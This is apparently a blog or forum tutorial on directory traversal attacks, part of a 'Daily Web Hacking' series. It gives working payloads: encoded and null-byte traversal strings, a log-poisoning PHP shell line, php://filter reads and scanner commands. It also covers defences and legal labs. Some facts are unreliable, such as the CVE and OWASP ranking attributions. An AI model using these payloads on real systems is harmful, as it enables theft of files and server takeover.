- Edited
Hey guys, Rocky here! 🚪🔓
Welcome to Day 9 of the Daily Web Hacking series! So far, we’ve tackled authentication bypasses, file upload vulns, and XSS. Today, we’re diving into Part 9: Directory Traversal—the hack that lets you “escape” a website’s restricted folders and rummage through the server’s entire file system. Imagine breaking out of a prison cell only to find the warden’s secret file cabinet. Let’s get into it!
—
What is Directory Traversal?
Directory Traversal (aka Path Traversal) is a vulnerability that allows attackers to read, write, or execute files outside the web root directory (the folder where the website’s public files live). By manipulating file paths (e.g., ../../
), hackers can:
- Steal sensitive files (
/etc/passwd
,.env
, backups). - Access source code or configuration files.
- Plant malware or overwrite critical system files.
Why it’s dangerous:
- #4 in the OWASP Top 10 (Path Traversal, 2021).
- Found in 33% of web apps (Snyk, 2023).
- Can lead to full server compromise.
—
How Directory Traversal Works
Web apps often use user-supplied input to load files (e.g., profile pictures, PDFs). If the app doesn’t sanitize input properly, attackers can inject path sequences like ../
to “escape” the web root.
Example:
A site loads user avatars via:
https://site.com/load?file=rocky.jpg
An attacker changes file=rocky.jpg
to:
file=../../../../etc/passwd
Result: The server returns the /etc/passwd
file, exposing system users!
—
Types of Directory Traversal
1. Basic Traversal
Use
../
(Unix) or..\
(Windows) to climb directories.Payload:
../../../../etc/passwd
2. Encoded Traversal
- Bypass filters with URL encoding, double encoding, or Unicode.
- Payloads:
- URL-encoded:
..%2F..%2Fetc%2Fpasswd
- Double-encoded:
..%252F..%252Fetc%252Fpasswd
- URL-encoded:
3. Null Byte Injection
Terminate the filename early to bypass appending extensions.
Payload:
../../etc/passwd%00.jpg
The server processes
passwd%00
aspasswd
, ignoring.jpg
.
4. Absolute Path Abuse
Directly reference absolute paths (if allowed).
Payload:
/etc/passwd
—
Real-World Directory Traversal Disasters
- Apache (2019):
CVE-2019-0211
allowed traversal via PHP scripts. - WordPress (2017): Plugin flaw exposed
wp-config.php
files. - Tesla (2018): Misconfigured servers leaked vehicle telemetry.
Lesson: Even tech giants mess up.
—
Step-by-Step Exploitation
Goal: Steal the /etc/passwd
file from a vulnerable photo-sharing site.
1. Find a Vulnerable Endpoint
Look for parameters like
?file=
,?page=
, or?load=
.Example URL:
https://hacklivly.com/view?image=profile.jpg
2. Test Basic Traversal
Modify the parameter:
image=../../../../etc/passwd
If the server returns the file, you’ve won!
3. Bypass Filters
If blocked, try encoding:
image=..%2F..%2Fetc%2Fpasswd
Or add a null byte:
image=../../etc/passwd%00.jpg
4. Escalate Access
- Steal config files:
.env
,config.php
,wp-config.php
. - Execute code: If you can write files, upload a web shell.
—
Advanced Traversal Tactics
1. Writing Files
How: If the app lets you upload or modify files.
Payload:
../../var/www/html/shell.php
Impact: Execute commands via
https://site.com/shell.php
.
2. Log Poisoning
Inject PHP into log files (e.g.,
access.log
), then traverse to them:GET /<?php system($_GET['cmd']); ?>
Trigger execution:
https://site.com/view?file=../../var/log/apache2/access.log&cmd=id
3. PHP Wrappers
Use
php://filter
to read encoded files:file=php://filter/convert.base64-encode/resource=../../etc/passwd
Decode the Base64 output to get the file.
—
Tools for Directory Traversal
1. Burp Suite
- Repeater: Test payloads manually.
- Intruder: Brute-force common paths (
/etc/passwd
,.env
).
2. DotDotPwn
Automated directory traversal tool:
dotdotpwn -m http -h hacklivly.com -x /load?file=TRAVERSAL
3. FFUF (Fuzz Faster U Fool)
Fuzz for exposed files:
ffuf -w paths.txt -u https://hacklivly.com/view?file=FUZZ
—
Defending Against Directory Traversal
For Developers
Input Validation
Block
../
,..\
, and absolute paths.PHP Example:
$file = basename($_GET['file']); // Strips path info
Whitelist Allowed Files
Use a mapping of allowed filenames:
allowed_files = {"profile.jpg": "images/profile.jpg"} file = allowed_files.get(request.args.get('file'), "default.jpg")
Use Platform-Safe Functions
Python:
os.path.realpath()
+ check if path starts with web root.Java:
Path.normalize()
+ validate.
Store Files Outside Web Root
Serve files via a secure proxy script.
For Admins
File Permissions
Restrict read/write access to web directories.
chmod 755 /var/www/html
Web Application Firewall (WAF)
Block requests with
../
,etc/passwd
, etc.
Log Monitoring
Alert on repeated traversal attempts.
—
Practice Legally: Labs & Challenges
- DVWA (Damn Vulnerable Web App):
- Practice traversal in the File Inclusion module.
- PortSwigger Labs:
- Free labs: Directory Traversal.
- Hack The Box:
- Machines like Traverxec focus on path traversal.
—
Ethical Hacking & Reporting
Never exploit traversal vulns without permission. If you find one:
- Document: Record steps to reproduce.
- Report: Use the site’s security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
—
Final Thoughts
Directory traversal is the digital equivalent of picking a lock. It’s simple, silent, and shockingly effective. By validating inputs, hardening servers, and thinking like a hacker, you can slam the door on this attack.
Remember: The web’s security depends on you. Find flaws, fix them, and keep the internet safe—one ../
at a time.
Rocky out! ✌️
—
P.S. If you’re loving this series, share it with your crew! Let’s turn script kiddies into security guardians.
Discussion Question: What’s the wildest file you’ve accessed via traversal? I once found a database backup chilling in /var/backups
. 😅 Spill your stories below! 👇